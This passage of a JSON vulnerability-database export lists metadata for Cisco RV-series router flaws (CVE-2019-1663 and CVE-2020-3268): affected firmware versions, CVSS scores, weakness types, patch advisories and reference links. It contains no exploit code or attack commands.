              "Network device"
            ],
            "sub_category": null,
            "trust": 1.2
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:37:39.016000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20190227-rmi-cmd-ex",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex"
          },
          {
            "title": "Patch for CiscoRV110W, RV130W, and RV215W Remote Command Execution Vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/155001"
          },
          {
            "title": "Patch for Buffer Overflow Vulnerability in Multiple Cisco Products (CNVD-2022-32613)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/331126"
          },
          {
            "title": "Cisco?RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router  and RV215W Wireless-N VPN Router Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89695"
          },
          {
            "title": "Cisco: Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20190227-rmi-cmd-ex"
          },
          {
            "title": "Cisco-RV130W",
            "trust": 0.1,
            "url": "https://github.com/welove88888/Cisco-RV130W "
          },
          {
            "title": "dir2md",
            "trust": 0.1,
            "url": "https://github.com/XinRoom/dir2md "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/zero-day-bug-soho-routers/165321/"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2019/06/24/security_roundup/"
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/cisco-fixes-critical-flaw-in-wireless-vpn-firewall-routers/142284/"
          },
          {
            "title": "BleepingComputer",
            "trust": 0.1,
            "url": "https://www.bleepingcomputer.com/news/security/cisco-fixes-critical-rce-vulnerability-in-rv110w-rv130w-and-rv215w-routers/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1663"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-20",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190227-rmi-cmd-ex"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1663"
          },
          {
            "trust": 1.9,
            "url": "http://www.securityfocus.com/bid/107185"
          },
          {
            "trust": 1.3,
            "url": "http://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv130_rmi_rce"
          },
          {
            "trust": 1.2,
            "url": "https://www.exploit-db.com/exploits/46705/"
          },
          {
            "trust": 1.2,
            "url": "http://packetstormsecurity.com/files/152507/cisco-rv130w-routers-management-interface-remote-command-execution.html"
          },
          {
            "trust": 1.2,
            "url": "http://packetstormsecurity.com/files/153163/cisco-rv130w-1.0.3.44-remote-stack-overflow.html"
          },
          {
            "trust": 1.2,
            "url": "http://packetstormsecurity.com/files/154310/cisco-rv110w-rv130-w-rv215w-remote-command-execution.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1663"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploitalert.com/view-details.html?id=33303"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/42833"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/76242"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/welove88888/cisco-rv130w"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/47348"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1663"
          },
          {
            "db": "BID",
            "id": "107185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1663"
          },
          {
            "db": "BID",
            "id": "107185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-03-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "date": "2022-05-29T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "date": "2019-02-28T00:00:00",
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "date": "2019-02-28T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-1663"
          },
          {
            "date": "2019-02-27T00:00:00",
            "db": "BID",
            "id": "107185"
          },
          {
            "date": "2019-04-03T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "date": "2019-02-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          },
          {
            "date": "2019-02-28T18:29:02.040000",
            "db": "NVD",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-06T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "date": "2022-05-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "date": "2020-10-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "date": "2020-10-05T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-1663"
          },
          {
            "date": "2019-02-27T00:00:00",
            "db": "BID",
            "id": "107185"
          },
          {
            "date": "2019-04-03T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "date": "2019-03-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          },
          {
            "date": "2024-11-21T04:37:02.680000",
            "db": "NVD",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco RV Vulnerability related to input validation in products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202006-1113

    Vulnerability from variot - Updated: 2024-11-23 21:35

    Multiple vulnerabilities in the web-based management interface of Cisco RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary commands. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco RV110W is a VPN firewall router from Cisco in the United States.

    There are command injection vulnerabilities in many Cisco products. The vulnerability stems from the web interface's failure to properly verify the input submitted by the user

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202006-1113",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.5"
          },
          {
            "model": "rv130w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.54"
          },
          {
            "model": "rv130",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.54"
          },
          {
            "model": "rv215w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.5"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "small business rv110w wireless-n vpn firewall",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "\u003c=1.2.2.5"
          },
          {
            "model": "small business rv130 vpn router",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "\u003c=1.0.3.54"
          },
          {
            "model": "small business rv130w wireless-n multifunction vpn router",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "\u003c=1.0.3.54"
          },
          {
            "model": "small business rv215w wireless-n vpn router",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "\u003c=1.3.1.5"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3268"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Kai Cheng",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-3268",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2020-3268",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-006869",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2020-35164",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2020-3268",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2020-3268",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-006869",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-3268",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2020-3268",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-006869",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-35164",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202006-1154",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3268"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3268"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary commands. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco RV110W is a VPN firewall router from Cisco in the United States. \n\r\n\r\nThere are command injection vulnerabilities in many Cisco products. The vulnerability stems from the web interface\u0027s failure to properly verify the input submitted by the user",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-3268"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-3268",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2119",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3268"
          }
        ]
      },
      "id": "VAR-202006-1113",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          }
        ],
        "trust": 1.2577208514285716
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:35:43.641000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-routers-injection-tWC7krKQ",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-injection-tWC7krKQ"
          },
          {
            "title": "Patch for Multiple Cisco product command injection vulnerabilities (CNVD-2020-35164)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/223627"
          },
          {
            "title": "Multiple Cisco Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=122551"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3268"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-routers-injection-twc7krkq"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3268"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3268"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2119/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3268"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3268"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-06-30T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          },
          {
            "date": "2020-07-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "date": "2020-06-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          },
          {
            "date": "2020-06-18T03:15:11.963000",
            "db": "NVD",
            "id": "CVE-2020-3268"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-06-30T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-35164"
          },
          {
            "date": "2020-07-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          },
          {
            "date": "2020-06-29T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          },
          {
            "date": "2024-11-21T05:30:41.707000",
            "db": "NVD",
            "id": "CVE-2020-3268"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco RV Buffer error vulnerability in series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006869"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1154"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202006-1114

    Vulnerability from variot - Updated: 2024-11-23 21:35

    Multiple vulnerabilities in the web-based management interface of Cisco RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary commands. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco RV110W is a VPN firewall router from Cisco in the United States.

    There are buffer overflow vulnerabilities in the web management interface of many Cisco products. The vulnerability stems from the program's failure to properly limit user input boundaries

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
